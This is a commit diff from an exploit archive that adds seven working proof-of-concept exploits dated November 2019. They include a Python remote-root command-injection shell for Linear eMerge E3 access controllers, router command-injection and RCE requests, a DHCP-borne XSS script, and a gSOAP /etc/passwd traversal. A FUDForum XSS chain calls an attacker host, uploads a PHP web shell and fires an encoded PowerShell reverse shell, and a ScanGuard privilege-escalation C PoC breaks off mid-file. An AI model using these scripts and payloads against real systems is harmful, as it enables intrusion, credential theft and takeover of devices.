DB: 2019-11-14
7 changes to exploits/shellcodes ScanGuard Antivirus 2020 - Insecure Folder Permissions Linear eMerge E3 1.00-06 - Remote Code Execution FUDForum 3.0.9 - Remote Code Execution Technicolor TD5130.2 - Remote Command Execution Technicolor TC7300.B0 - 'hostname' Persistent Cross-Site Scripting gSOAP 2.8 - Directory Traversal Fastweb Fastgate 0.00.81 - Remote Code Execution
This commit is contained in:
parent
c8181201fd
commit
e84e1285da
8 changed files with 610 additions and 0 deletions
116
exploits/hardware/webapps/47649.py
Executable file
116
exploits/hardware/webapps/47649.py
Executable file
|
@ -0,0 +1,116 @@
|
|||
# Title: Linear eMerge E3 1.00-06 - Remote Code Execution
|
||||
# Author: LiquidWorm
|
||||
# Date: 2019-11-13
|
||||
# Vendor Homepage: http://linear-solutions.com/nsc_family/e3-series/
|
||||
# Software Link: http://linear-solutions.com/nsc_family/e3-series/
|
||||
# Affected version: <=2.3.0a
|
||||
# Advisory: https://applied-risk.com/resources/ar-2019-005
|
||||
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
|
||||
# CVE: CVE-2019-7256
|
||||
|
||||
#!/usr/bin/env python
|
||||
#
|
||||
# Linear eMerge E3 Unauthenticated Command Injection Remote Root Exploit
|
||||
# Affected version: <=1.00-06
|
||||
# via card_scan_decoder.php
|
||||
# CVE: CVE-2019-7256
|
||||
# Advisory: https://applied-risk.com/resources/ar-2019-005
|
||||
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
|
||||
#
|
||||
# By Gjoko 'LiquidWorm' Krstic
|
||||
#
|
||||
#########################################################################
|
||||
# lqwrm@metalgear:~/stuff$ python emergeroot2.py 192.168.1.2
|
||||
# Do you want me to try and get the web front-end credentials? (y/n) y
|
||||
# ID='admin',Password='MakeLoveNotWar!'
|
||||
#
|
||||
# lighttpd@192.168.1.2:/spider/web/webroot$ id
|
||||
# uid=1003(lighttpd) gid=0(root)
|
||||
#
|
||||
# lighttpd@192.168.1.2:/spider/web/webroot$ cat /etc/version
|
||||
# Software Version: 1.00.03
|
||||
# Image: nxgcpub-image
|
||||
# Built by: jenkins
|
||||
#
|
||||
# lighttpd@192.168.1.2:/spider/web/webroot$ echo davestyle |su -c id
|
||||
# Password:
|
||||
# uid=0(root) gid=0(root) groups=0(root)
|
||||
#
|
||||
# lighttpd@192.168.1.2:/spider/web/webroot$ exit
|
||||
#
|
||||
# [+] Erasing read stage file and exiting...
|
||||
# [+] Done. Ba-bye!
|
||||
#
|
||||
#########################################################################
|
||||
|
||||
import requests
|
||||
import time####
|
||||
import sys#####
|
||||
import os######
|
||||
import re######
|
||||
|
||||
piton = os.path.basename(sys.argv[0])
|
||||
|
||||
if len(sys.argv) < 2:
|
||||
print '''
|
||||
.....
|
||||
.e$$$$$$$$$$$$$$e.
|
||||
z$$ ^$$$$$$$$$$$$$$$$$.
|
||||
.$$$* J$$$$$$$$$$$$$$$$$$$e
|
||||
.$" .$$$$$$$$$$$$$$$$$$$$$$*-
|
||||
.$ $$$$$$$$$$$$$$$$***$$ .ee"
|
||||
z**$$ $$r ^**$$$$$$$$$*" .e$$$$$$*"
|
||||
" -\e$$ 4$$$$. .ze$$$""""
|
||||
4 z$$$$$ $$$$$$$$$$$$$$$$$$$$"
|
||||
$$$$$$$$ .$$$$$$$$$$$**$$$$*"
|
||||
z$$" $$ $$$$P*"" J$*$$c
|
||||
$$" $$F .$$$ $$ ^$$
|
||||
$$ *$$c.z$$$ $$ $$
|
||||
$P $$$$$$$ 4$F 4$
|
||||
dP *$$$" $$ '$r
|
||||
.$ J$" $"
|
||||
$ $P 4$
|
||||
F $$ 4$
|
||||
4$% 4$
|
||||
$$ 4$
|
||||
d$" $$
|
||||
$P $$
|
||||
$$ $$
|
||||
4$% $$
|
||||
$$ $$
|
||||
d$ $$
|
||||
$F "3
|
||||
r=4e=" ... ..rf . ""%
|
||||
$**$*"^""=..^4*=4=^"" ^"""
|
||||
'''
|
||||
print '\n\x20\x20[+] Linear eMerge E3 Remote Root Exploit'
|
||||
print '\x20\x20[-] by lqwrm (c) 2019'
|
||||
print '\n\x20\x20[*] Usage: '+piton+' <ipaddress:port>\n'
|
||||
sys.exit()
|
||||
|
||||
ipaddr = sys.argv[1]
|
||||
|
||||
creds = raw_input('Do you want me to try and get the web front-end credentials? (y/n) ')
|
||||
if creds.strip() == 'y':
|
||||
frontend = '''grep "Controller" /tmp/SpiderDB/Spider.db |cut -f 5,6 -d ',' |grep ID'''
|
||||
requests.get('http://'+ipaddr+'/card_scan_decoder.php?No=30&door=%60'+frontend+' > test.txt%60')
|
||||
showme = requests.get('http://'+ipaddr+'/test.txt')
|
||||
print showme.text
|
||||
|
||||
while True:
|
||||
try:
|
||||
cmd = raw_input('lighttpd@'+ipaddr+':/spider/web/webroot$ ')
|
||||
execute = requests.get('http://'+ipaddr+'/card_scan_decoder.php?No=30&door=%60'+cmd+' > test.txt%60')
|
||||
#time.sleep(1);
|
||||
readreq = requests.get('http://'+ipaddr+'/test.txt')
|
||||
print readreq.text
|
||||
if cmd.strip() == 'exit':
|
||||
print "[+] Erasing read stage file and exiting..."
|
||||
requests.get('http://'+ipaddr+'/card_scan_decoder.php?No=30&ReaderNo=%60rm test.txt%60')
|
||||
print "[+] Done. Ba-bye!\n"
|
||||
break
|
||||
else: continue
|
||||
except Exception:
|
||||
break
|
||||
|
||||
sys.exit()
|
24
exploits/hardware/webapps/47651.txt
Normal file
24
exploits/hardware/webapps/47651.txt
Normal file
|
@ -0,0 +1,24 @@
|
|||
# Exploit Title: Technicolor TD5130.2 - Remote Command Execution
|
||||
# Date: 2019-11-12
|
||||
# Exploit Author: João Teles
|
||||
# Vendor Homepage: https://www.technicolor.com/
|
||||
# Version: TD5130v2
|
||||
# Firmware Version: OI_Fw_V20
|
||||
# CVE : CVE-2019-18396
|
||||
|
||||
---------------------------
|
||||
|
||||
POST /mnt_ping.cgi HTTP/1.1
|
||||
Host: HOST
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Referer: http:/HOST/mnt_ping.cgi
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 53
|
||||
Cookie: session=COOKIE
|
||||
Connection: close
|
||||
Upgrade-Insecure-Requests: 1
|
||||
|
||||
isSubmit=1&addrType=3&pingAddr=;ls&send=Send
|
89
exploits/hardware/webapps/47652.py
Executable file
89
exploits/hardware/webapps/47652.py
Executable file
|
@ -0,0 +1,89 @@
|
|||
# Exploit Title: Technicolor TC7300.B0 - 'hostname' Persistent Cross-Site Scripting
|
||||
# Google Dork: N/A
|
||||
# Date: 2019-11-11
|
||||
# Exploit Author: Luis Stefan
|
||||
# Vendor Homepage: https://www.technicolor.com/
|
||||
# Software Link: N/A
|
||||
# Version: TC7300.B0 - STFA.51.20
|
||||
# Tested on: macOS Mojave and Catalina
|
||||
# CVE :
|
||||
|
||||
#!/usr/bin/env python3
|
||||
__author__ = "Luis Stefan"
|
||||
__license__ = "MIT"
|
||||
__version__ = "1.0"
|
||||
__email__ = "luis.ss@protonmail.com"
|
||||
__description__ = """CVE-2019-17524.py: This script is used to exploit a xss vulnerability found in a technicolor device."""
|
||||
|
||||
from enum import IntEnum
|
||||
from scapy.all import *
|
||||
import codecs, threading, time
|
||||
|
||||
# Define your network interface
|
||||
interface = 'en0'
|
||||
# Insert your interface card mac address
|
||||
mac = 'xx:xx:xx:xx:xx:xx'
|
||||
broadcast = 'ff:ff:ff:ff:ff:ff'
|
||||
mac_hxd = codecs.decode(mac.replace(':', ''),'hex')
|
||||
|
||||
class Bootp(IntEnum):
|
||||
Discover = 1
|
||||
Offer = 2
|
||||
Request = 3
|
||||
Decline = 4
|
||||
Ack = 5
|
||||
Nak = 6
|
||||
Release = 7
|
||||
|
||||
def dhcp_discover():
|
||||
disc_pkt = Ether(src=mac, dst=broadcast) / \
|
||||
IP(src='0.0.0.0', dst='255.255.255.255') / \
|
||||
UDP(dport=67, sport=68) / BOOTP(chaddr=mac_hxd) / \
|
||||
DHCP(options=[('message-type', 'discover'), 'end'])
|
||||
sendp(disc_pkt, iface=interface)
|
||||
|
||||
def dhcp_request(pkt):
|
||||
yraddr = pkt['BOOTP'].yraddr
|
||||
# gwaddr == Gateway Ip Address
|
||||
gwaddr = '192.168.0.1'
|
||||
param_req_list = []
|
||||
hostname = "<script>alert('XSS triggered')</script>"
|
||||
req_pkt = Ether(src=mac, dst=broadcast) / \
|
||||
IP(src='0.0.0.0', dst='255.255.255.255') / \
|
||||
UDP(dport=67, sport=68) / BOOTP(chaddr=mac_hxd) / \
|
||||
DHCP(options=[('message-type', 'request'), ('server_id', gwaddr),
|
||||
('requested_addr', yraddr), ('hostname', hostname), 'end'])
|
||||
sendp(req_pkt, iface=interface)
|
||||
|
||||
def dhcp(pkt):
|
||||
print(pkt.display())
|
||||
print("#############################################################")
|
||||
if pkt.haslayer(DHCP) and pkt['DHCP'].options[0][1] == Bootp.Offer:
|
||||
dhcp_request(pkt)
|
||||
elif pkt.haslayer(DHCP) and pkt['DHCP'].options[0][1] == Bootp.Ack:
|
||||
print("Server Acknowledged")
|
||||
sys.exit(0)
|
||||
elif pkt.haslayer(DHCP) and pkt['DHCP'].options[0][1] == Bootp.Decline:
|
||||
print("Server Declined")
|
||||
sys.exit(0)
|
||||
elif pkt.haslayer(DHCP) and pkt['DHCP'].options[0][1] == Bootp.Nak:
|
||||
print("Server Nak")
|
||||
sys.exit(0)
|
||||
|
||||
|
||||
def ver_dhcp():
|
||||
print("Verifying DHCP port traffic..")
|
||||
sniff(iface=interface, prn=dhcp, filter="port 68 and port 67", timeout=20)
|
||||
sys.exit(0)
|
||||
|
||||
|
||||
def main():
|
||||
t1 = threading.Thread(target=ver_dhcp, args=())
|
||||
t1.setDaemon = True
|
||||
t1.start()
|
||||
time.sleep(2)
|
||||
dhcp_discover()
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
84
exploits/hardware/webapps/47654.py
Executable file
84
exploits/hardware/webapps/47654.py
Executable file
|
@ -0,0 +1,84 @@
|
|||
# Exploit Title: Fastweb Fastgate 0.00.81 - Remote Code Execution
|
||||
# Date: 2019-11-13
|
||||
# Exploit Author: Riccardo Gasparini
|
||||
# Vendor Homepage: https://www.fastweb.it/
|
||||
# Software Link: http://59.0.121.191:8080/ACS-server/file/0.00.81_FW_200_Askey (only from Fastweb ISP network)
|
||||
# Version: 0.00.81
|
||||
# Tested on: Linux
|
||||
# CVE : N/A
|
||||
|
||||
import requests, json, time, sys
|
||||
|
||||
current_milli_time = lambda: int(round(time.time() * 1000))
|
||||
|
||||
password='XXXXXXXXXXXXXXX'
|
||||
|
||||
if password == 'XXXXXXXXXXXXXXX':
|
||||
print("Password is set to XXXXXXXXXXXXXXX\nOpen the script and change the password")
|
||||
sys.exit(-1)
|
||||
|
||||
#get XSRF-TOKEN
|
||||
headers = {
|
||||
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36',
|
||||
'Referer': 'http://192.168.1.254/tr069',
|
||||
}
|
||||
params = ()
|
||||
response = requests.get('http://192.168.1.254', headers=headers)
|
||||
|
||||
#login request and get sessionKey
|
||||
xsrfToken=response.cookies['XSRF-TOKEN']
|
||||
cookies = {
|
||||
'XSRF-TOKEN': xsrfToken,
|
||||
}
|
||||
headers = {
|
||||
'Pragma': 'no-cache',
|
||||
'X-XSRF-TOKEN': xsrfToken,
|
||||
'Accept-Language': 'en-US,en-GB;q=0.9,en;q=0.8,it-IT;q=0.7,it;q=0.6,es;q=0.5,de;q=0.4',
|
||||
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36',
|
||||
'Accept': 'application/json, text/plain, */*',
|
||||
'Referer': 'http://192.168.1.254/tr069',
|
||||
'Accept-Encoding': 'gzip, deflate',
|
||||
'Connection': 'keep-alive',
|
||||
'Cache-Control': 'no-cache',
|
||||
}
|
||||
params = (
|
||||
('_', str(current_milli_time())),
|
||||
('cmd', '3'),
|
||||
('nvget', 'login_confirm'),
|
||||
('password', password),
|
||||
('remember_me', '1'),
|
||||
('sessionKey', 'NULL'),
|
||||
('username', 'admin'),
|
||||
)
|
||||
|
||||
response = requests.get('http://192.168.1.254/status.cgi', headers=headers, params=params, cookies=cookies)
|
||||
|
||||
jsonResponse = json.loads(response.text)
|
||||
sessionKey=jsonResponse["login_confirm"]["check_session"]
|
||||
|
||||
print("Executing command reboot\n")
|
||||
|
||||
#some commands as example are shown below in the mount parameter
|
||||
params = (
|
||||
('_', str(current_milli_time())),
|
||||
('act','nvset'),
|
||||
('service','usb_remove'),
|
||||
#Code execution
|
||||
#('mount','&ping -c 10 192.168.1.172&'),
|
||||
#('mount','&dropbear -r /etc/dropbear/dropbear_rsa_host_key&'),#to enable SSH
|
||||
('mount','&reboot&'),
|
||||
('sessionKey', sessionKey),
|
||||
)
|
||||
response = requests.get('http://192.168.1.254/status.cgi', headers=headers, params=params, cookies=cookies)
|
||||
print(response.text)
|
||||
|
||||
#logout
|
||||
params = (
|
||||
('_', str(current_milli_time())),
|
||||
('cmd', '5'),
|
||||
('nvget', 'login_confirm'),
|
||||
('sessionKey', sessionKey),
|
||||
)
|
||||
|
||||
response = requests.get('http://192.168.1.254/status.cgi', headers=headers, params=params, cookies=cookies)
|
||||
print(json.dumps(json.loads(response.text), indent=2))
|
103
exploits/php/webapps/47650.txt
Normal file
103
exploits/php/webapps/47650.txt
Normal file
|
@ -0,0 +1,103 @@
|
|||
# Exploit Title : FUDForum 3.0.9 - Remote Code Execution
|
||||
# Date: 2019-10-26
|
||||
# Exploit Author: liquidsky (JMcPeters)
|
||||
# Vulnerable Software: FUDForum 3.0.9
|
||||
# Vendor Homepage: https://sourceforge.net/projects/fudforum/
|
||||
# Version: 3.0.9
|
||||
# Software Link: https://sourceforge.net/projects/fudforum/files/FUDforum_3.0.9.zip/download
|
||||
# Tested On: Windows / mysql / apache
|
||||
# Author Site: https://github.com/fuzzlove/FUDforum-XSS-RCE
|
||||
# Demo: https://youtu.be/0gsJQ82TXw4 | https://youtu.be/fR8hVK1paks
|
||||
# CVE: CVE-2019-18873
|
||||
|
||||
|
||||
// Greetz : wetw0rk, Fr13ndz, offsec =)
|
||||
//
|
||||
// Description: Multiple Stored XSS vulnerabilities have been found in FUDforum 3.0.9 that may result in remote code execution.
|
||||
// The areas impacted are the admin panel and the forum.
|
||||
//
|
||||
// XSS via username in Forum:
|
||||
// 1. Register an account and log in to the forum.
|
||||
// 2. Go to the user control panel. -> Account Settings -> change login
|
||||
// 3. Insert javascript payload <script/src="http://attacker.machine/fud.js"></script>
|
||||
// 4. When the admin visits the user information the payload will fire, uploading a php shell on the remote system.
|
||||
//
|
||||
// XSS via user-agent in Admin Panel:
|
||||
// 1. Register an account and log in to the forum. If you have an IP already associated with a registered user this is not required. This step is so when you run the XSS payload from your attacker machine it gets logged under the user activity.
|
||||
// 2. Send the XSS payload below (from an IP associated with an account) / host the script:
|
||||
// 3. curl -A '<script src="http://attacker.machine/fud.js"></script>' http://target.machine/fudforum/index.php
|
||||
// 4. When the admin visits the user information from the admin controls / User Manager the payload will fire under "Recent sessions", uploading a php shell on the remote system.
|
||||
//
|
||||
|
||||
function patience()
|
||||
{
|
||||
var u=setTimeout("grabShell()",5000);
|
||||
}
|
||||
|
||||
// This function is to call the reverse shell php script (liquidsky.php).
|
||||
// currently using a powershell payload that will need to be modified.
|
||||
function grabShell()
|
||||
{
|
||||
var url ="/fudforum/liquidsky.php?cmd=%70%6f%77%65%72%73%68%65%6c%6c%20%2d%45%6e%63%6f%64%65%64%43%6f%6d%6d%61%6e%64%20%4a%41%42%6a%41%47%77%41%61%51%42%6c%41%47%34%41%64%41%41%67%41%44%30%41%49%41%42%4f%41%47%55%41%64%77%41%74%41%45%38%41%59%67%42%71%41%47%55%41%59%77%42%30%41%43%41%41%55%77%42%35%41%48%4d%41%64%41%42%6c%41%47%30%41%4c%67%42%4f%41%47%55%41%64%41%41%75%41%46%4d%41%62%77%42%6a%41%47%73%41%5a%51%42%30%41%48%4d%41%4c%67%42%55%41%45%4d%41%55%41%42%44%41%47%77%41%61%51%42%6c%41%47%34%41%64%41%41%6f%41%43%63%41%4d%51%41%35%41%44%49%41%4c%67%41%78%41%44%59%41%4f%41%41%75%41%44%49%41%4f%41%41%75%41%44%45%41%4e%51%41%79%41%43%63%41%4c%41%41%30%41%44%51%41%4d%77%41%70%41%44%73%41%4a%41%42%7a%41%48%51%41%63%67%42%6c%41%47%45%41%62%51%41%67%41%44%30%41%49%41%41%6b%41%47%4d%41%62%41%42%70%41%47%55%41%62%67%42%30%41%43%34%41%52%77%42%6c%41%48%51%41%55%77%42%30%41%48%49%41%5a%51%42%68%41%47%30%41%4b%41%41%70%41%44%73%41%57%77%42%69%41%48%6b%41%64%41%42%6c%41%46%73%41%58%51%42%64%41%43%51%41%59%67%42%35%41%48%51%41%5a%51%42%7a%41%43%41%41%50%51%41%67%41%44%41%41%4c%67%41%75%41%44%59%41%4e%51%41%31%41%44%4d%41%4e%51%42%38%41%43%55%41%65%77%41%77%41%48%30%41%4f%77%42%33%41%47%67%41%61%51%42%73%41%47%55%41%4b%41%41%6f%41%43%51%41%61%51%41%67%41%44%30%41%49%41%41%6b%41%48%4d%41%64%41%42%79%41%47%55%41%59%51%42%74%41%43%34%41%55%67%42%6c%41%47%45%41%5a%41%41%6f%41%43%51%41%59%67%42%35%41%48%51%41%5a%51%42%7a%41%43%77%41%49%41%41%77%41%43%77%41%49%41%41%6b%41%47%49%41%65%51%42%30%41%47%55%41%63%77%41%75%41%45%77%41%5a%51%42%75%41%47%63%41%64%41%42%6f%41%43%6b%41%4b%51%41%67%41%43%30%41%62%67%42%6c%41%43%41%41%4d%41%41%70%41%48%73%41%4f%77%41%6b%41%47%51%41%59%51%42%30%41%47%45%41%49%41%41%39%41%43%41%41%4b%41%42%4f%41%47%55%41%64%77%41%74%41%45%38%41%59%67%42%71%41%47%55%41%59%77%42%30%41%43%41%41%4c%51%42%55%41%48%6b%41%63%41%42%6c%41%45%34%41%59%51%42%74%41%47%55%41%49%41%42%54%41%48%6b%41%63%77%42%30%41%47%55%41%62%51%41%75%41%46%51%41%5a%51%42%34%41%48%51%41%4c%67%42%42%41%46%4d%41%51%77%42%4a%41%45%6b%41%52%51%42%75%41%47%4d%41%62%77%42%6b%41%47%6b%41%62%67%42%6e%41%43%6b%41%4c%67%42%48%41%47%55%41%64%41%42%54%41%48%51%41%63%67%42%70%41%47%34%41%5a%77%41%6f%41%43%51%41%59%67%42%35%41%48%51%41%5a%51%42%7a%41%43%77%41%4d%41%41%73%41%43%41%41%4a%41%42%70%41%43%6b%41%4f%77%41%6b%41%48%4d%41%5a%51%42%75%41%47%51%41%59%67%42%68%41%47%4d%41%61%77%41%67%41%44%30%41%49%41%41%6f%41%47%6b%41%5a%51%42%34%41%43%41%41%4a%41%42%6b%41%47%45%41%64%41%42%68%41%43%41%41%4d%67%41%2b%41%43%59%41%4d%51%41%67%41%48%77%41%49%41%42%50%41%48%55%41%64%41%41%74%41%46%4d%41%64%41%42%79%41%47%6b%41%62%67%42%6e%41%43%41%41%4b%51%41%37%41%43%51%41%63%77%42%6c%41%47%34%41%5a%41%42%69%41%47%45%41%59%77%42%72%41%44%49%41%49%41%41%67%41%44%30%41%49%41%41%6b%41%48%4d%41%5a%51%42%75%41%47%51%41%59%67%42%68%41%47%4d%41%61%77%41%67%41%43%73%41%49%41%41%6e%41%46%41%41%55%77%41%67%41%43%63%41%49%41%41%72%41%43%41%41%4b%41%42%77%41%48%63%41%5a%41%41%70%41%43%34%41%55%41%42%68%41%48%51%41%61%41%41%67%41%43%73%41%49%41%41%6e%41%44%34%41%49%41%41%6e%41%44%73%41%4a%41%42%7a%41%47%55%41%62%67%42%6b%41%47%49%41%65%51%42%30%41%47%55%41%49%41%41%39%41%43%41%41%4b%41%42%62%41%48%51%41%5a%51%42%34%41%48%51%41%4c%67%42%6c%41%47%34%41%59%77%42%76%41%47%51%41%61%51%42%75%41%47%63%41%58%51%41%36%41%44%6f%41%51%51%42%54%41%45%4d%41%53%51%42%4a%41%43%6b%41%4c%67%42%48%41%47%55%41%64%41%42%43%41%48%6b%41%64%41%42%6c%41%48%4d%41%4b%41%41%6b%41%48%4d%41%5a%51%42%75%41%47%51%41%59%67%42%68%41%47%4d%41%61%77%41%79%41%43%6b%41%4f%77%41%6b%41%48%4d%41%64%41%42%79%41%47%55%41%59%51%42%74%41%43%34%41%56%77%42%79%41%47%6b%41%64%41%42%6c%41%43%67%41%4a%41%42%7a%41%47%55%41%62%67%42%6b%41%47%49%41%65%51%42%30%41%47%55%41%4c%41%41%77%41%43%77%41%4a%41%42%7a%41%47%55%41%62%67%42%6b%41%47%49%41%65%51%42%30%41%47%55%41%4c%67%42%4d%41%47%55%41%62%67%42%6e%41%48%51%41%61%41%41%70%41%44%73%41%4a%41%42%7a%41%48%51%41%63%67%42%6c%41%47%45%41%62%51%41%75%41%45%59%41%62%41%42%31%41%48%4d%41%61%41%41%6f%41%43%6b%41%66%51%41%37%41%43%51%41%59%77%42%73%41%47%6b%41%5a%51%42%75%41%48%51%41%4c%67%42%44%41%47%77%41%62%77%42%7a%41%47%55%41%4b%41%41%70%41%41%6f%41";
|
||||
xhr = new XMLHttpRequest();
|
||||
xhr.open("GET", url, true);
|
||||
xhr.send(null);
|
||||
|
||||
}
|
||||
|
||||
function submitFormWithTokenJS(token) {
|
||||
var xhr = new XMLHttpRequest();
|
||||
xhr.open("POST", '/fudforum/adm/admbrowse.php', true);
|
||||
|
||||
// Send the proper header information along with the request
|
||||
xhr.setRequestHeader("Content-Type", "multipart/form-data, boundary=-----------------------------9703186584101745941654835853");
|
||||
|
||||
var currentdir = "C:/xampp/htdocs/fudforum"; // webroot - forum directory
|
||||
var fileName = "liquidsky.php";
|
||||
var url = "/fudforum/adm/admbrowse.php";
|
||||
var ctype = "application/x-php";
|
||||
var fileData = "<?php if(isset($_REQUEST['cmd'])){ echo '<pre>'; $cmd = ($_REQUEST['cmd']); system($cmd); echo '</pre>'; die; }?>";
|
||||
var boundary = "-----------------------------9703186584101745941654835853";
|
||||
var fileSize = fileData.length;
|
||||
|
||||
var body = "--" + boundary + "\r\n";
|
||||
body += 'Content-Disposition: form-data; name="cur"\r\n\r\n';
|
||||
body += currentdir + "\r\n";
|
||||
body += "--" + boundary + "\r\n";
|
||||
body += 'Content-Disposition: form-data; name="SQ"\r\n\r\n';
|
||||
body += token + "\r\n";
|
||||
body += "--" + boundary + "\r\n";
|
||||
body += 'Content-Disposition: form-data; name="fname"; filename="' + fileName + '"\r\n';
|
||||
body += "Content-Type: " + ctype + "\r\n\r\n";
|
||||
body += fileData + "\r\n\r\n";
|
||||
body += "--" + boundary + "\r\n";
|
||||
body += 'Content-Disposition: form-data; name="tmp_f_val"\r\n\r\n';
|
||||
body += "1" + "\r\n";
|
||||
body += "--" + boundary + "\r\n";
|
||||
body += 'Content-Disposition: form-data; name="d_name"\r\n\r\n';
|
||||
body += fileName + "\r\n";
|
||||
body += "--" + boundary + "\r\n";
|
||||
body += 'Content-Disposition: form-data; name="file_upload"\r\n\r\n';
|
||||
body += "Upload File" + '\r\n';
|
||||
body += "--" + boundary + "--";
|
||||
|
||||
xhr.send(body);
|
||||
}
|
||||
|
||||
//Grab SQ token
|
||||
var req = new XMLHttpRequest();
|
||||
|
||||
req.onreadystatechange=function()
|
||||
{
|
||||
if (req.readyState == 4 && req.status == 200) {
|
||||
var htmlPage = req.responseXML; /* fetch html */
|
||||
var SQ = htmlPage.getElementsByTagName("input")[0]
|
||||
submitFormWithTokenJS(SQ.value);
|
||||
}
|
||||
}
|
||||
|
||||
req.open("GET", "/fudforum/adm/admuser.php", true);
|
||||
req.responseType = "document";
|
||||
req.send();
|
||||
|
||||
patience();
|
27
exploits/php/webapps/47653.txt
Normal file
27
exploits/php/webapps/47653.txt
Normal file
|
@ -0,0 +1,27 @@
|
|||
# Title: gSOAP 2.8 - Directory Traversal
|
||||
# Author: Numan Türle
|
||||
# Date: 2019-11-13
|
||||
# Vendor Homepage: https://www.genivia.com/
|
||||
# Version : gSOAP 2.8
|
||||
# Software Link : https://www.genivia.com/products.html#gsoap
|
||||
|
||||
|
||||
POC
|
||||
---------
|
||||
|
||||
GET /../../../../../../../../../etc/passwd HTTP/1.1
|
||||
Host: 10.200.106.101
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
|
||||
Connection: close
|
||||
|
||||
Response
|
||||
---------
|
||||
HTTP/1.1 200 OK
|
||||
Server: gSOAP/2.8
|
||||
Content-Type: application/octet-stream
|
||||
Content-Length: 51
|
||||
Connection: close
|
||||
|
||||
root:$1$$qRPK7m23GJusamGpoGLby/:0:0::/root:/bin/sh
|
160
exploits/windows/local/47656.txt
Normal file
160
exploits/windows/local/47656.txt
Normal file
|
@ -0,0 +1,160 @@
|
|||
# Exploit Title: ScanGuard Antivirus 2020 - Insecure Folder Permissions
|
||||
# Date: 2019-10-10
|
||||
# Exploit Author: hyp3rlinx
|
||||
# Vendor Homepage: https://www.scanguard.com/
|
||||
# Software Link: https://support.scanguard.com/en/kb/22/upgrades-available
|
||||
# Version: 2020
|
||||
# Tested on: Windows
|
||||
# CVE : N/A
|
||||
# Category: exploit
|
||||
|
||||
|
||||
SCANGUARD-ANTIVIRUS-INSECURE-PERMISSIONS.txt
|
||||
|
||||
[+] Credits: hyp3rlinx
|
||||
[+] Website: hyp3rlinx.altervista.org
|
||||
[+] Source: http://hyp3rlinx.altervista.org/advisories/SCANGUARD-ANTIVIRUS-INSECURE-PERMISSIONS.txt
|
||||
[+] ISR: ApparitionSec
|
||||
|
||||
|
||||
[Vendor]
|
||||
https://www.scanguard.com
|
||||
|
||||
|
||||
[Product]
|
||||
ScanGuard Antivirus
|
||||
ScanGuard_Setup.exe Hash: 1a63c67a249da0c2e9abd09d35c3c65d
|
||||
|
||||
Complete Antivirus & Security Software
|
||||
|
||||
|
||||
[Vulnerability Type]
|
||||
Insecure Permissions
|
||||
|
||||
|
||||
[CVE Reference]
|
||||
CVE-2019-18895
|
||||
|
||||
|
||||
[Affected Product Code Base]
|
||||
ScanGuard Antivirus - latest
|
||||
|
||||
|
||||
[Affected Component]
|
||||
Permissions on installation directory
|
||||
|
||||
|
||||
[Attack Type]
|
||||
Local
|
||||
|
||||
|
||||
[Impact Code execution]
|
||||
true
|
||||
|
||||
|
||||
[Impact Escalation of Privileges]
|
||||
true
|
||||
|
||||
|
||||
[Impact Information Disclosure]
|
||||
true
|
||||
|
||||
|
||||
[Attack Vectors]
|
||||
Low integrity malware or non-privileged user replaces an executable to gain Admin privileges.
|
||||
|
||||
|
||||
[Reference]
|
||||
https://support.scanguard.com/en/kb/22/upgrades-available
|
||||
|
||||
|
||||
[Security Issue]
|
||||
Scanguard through 2019-11-12 on Windows has Insecure Permissions for the installation directory, leading to
|
||||
privilege escalation via a Trojan horse executable file.
|
||||
|
||||
The product sets weak access control restrictions, as permissions are set to Full Control for Everyone group.
|
||||
This can allow low integrity malware the ability to replace ScanGuard executables.
|
||||
|
||||
|
||||
C:\Program Files (x86)\ScanGuard\bins BUILTIN\Users:(OI)(CI)(ID)F
|
||||
Everyone:(OI)(CI)(ID)F
|
||||
NT SERVICE\TrustedInstaller:(ID)F
|
||||
NT SERVICE\TrustedInstaller:(CI)(IO)(ID)F
|
||||
NT AUTHORITY\SYSTEM:(ID)F
|
||||
|
||||
|
||||
[Exploit/POC]
|
||||
|
||||
#include <stdio.h>
|
||||
#include <windows.h>
|
||||
#define TARGET "C:\\Program Files (x86)\\ScanGuard\\ScanGuard.exe"
|
||||
#define DISABLED_TARGET "C:\\Program Files (x86)\\ScanGuard\\~.conf"
|
||||
|
||||
/* ScanGuard EoP
|
||||
PoC By hyp3rlinx */
|
||||
|
||||
BOOL PWNED=FALSE;
|
||||
|
||||
BOOL FileExists(LPCTSTR szPath){
|
||||
DWORD dwAttrib = GetFileAttributes(szPath);
|
||||
return (dwAttrib != INVALID_FILE_ATTRIBUTES && !(dwAttrib & FILE_ATTRIBUTE_DIRECTORY));
|
||||
}
|
||||
|
||||
void main(void){
|
||||
|
||||
if(!FileExists(DISABLED_TARGET)){
|
||||
rename(TARGET, DISABLED_TARGET);
|
||||
printf("[+] ScanGuard Antivirus EoP PoC\n");
|
||||
Sleep(300);
|
||||
printf("[+] Disabled ScanGuard.exe ...\n");
|
||||
Sleep(300);
|
||||
}else{
|
||||
PWNED=TRUE;
|
||||
}
|
||||
|
||||
char fname[MAX_PATH];
|
||||
char newLoc[]=TARGET;
|
||||
|
||||
DWORD size = GetModuleFileNameA(NULL, fname, MAX_PATH);
|
||||
if (size){
|
||||
if(!PWNED){
|
||||
printf("[+] Copying exploit to vuln dir...\n");
|
||||
Sleep(300);
|
||||
CopyFile(fname, newLoc, FALSE);
|
||||
printf("[+] Replaced legit ScanGuard...\n");
|
||||
Sleep(300);
|
||||
printf("[+] Done!\n");
|
||||
Sleep(300);
|
||||
MoveFile(fname, "c:\\Program Files (x86)\\ScanGuard\\ScamGuard.lnk");
|
||||
Sleep(2000);
|
||||
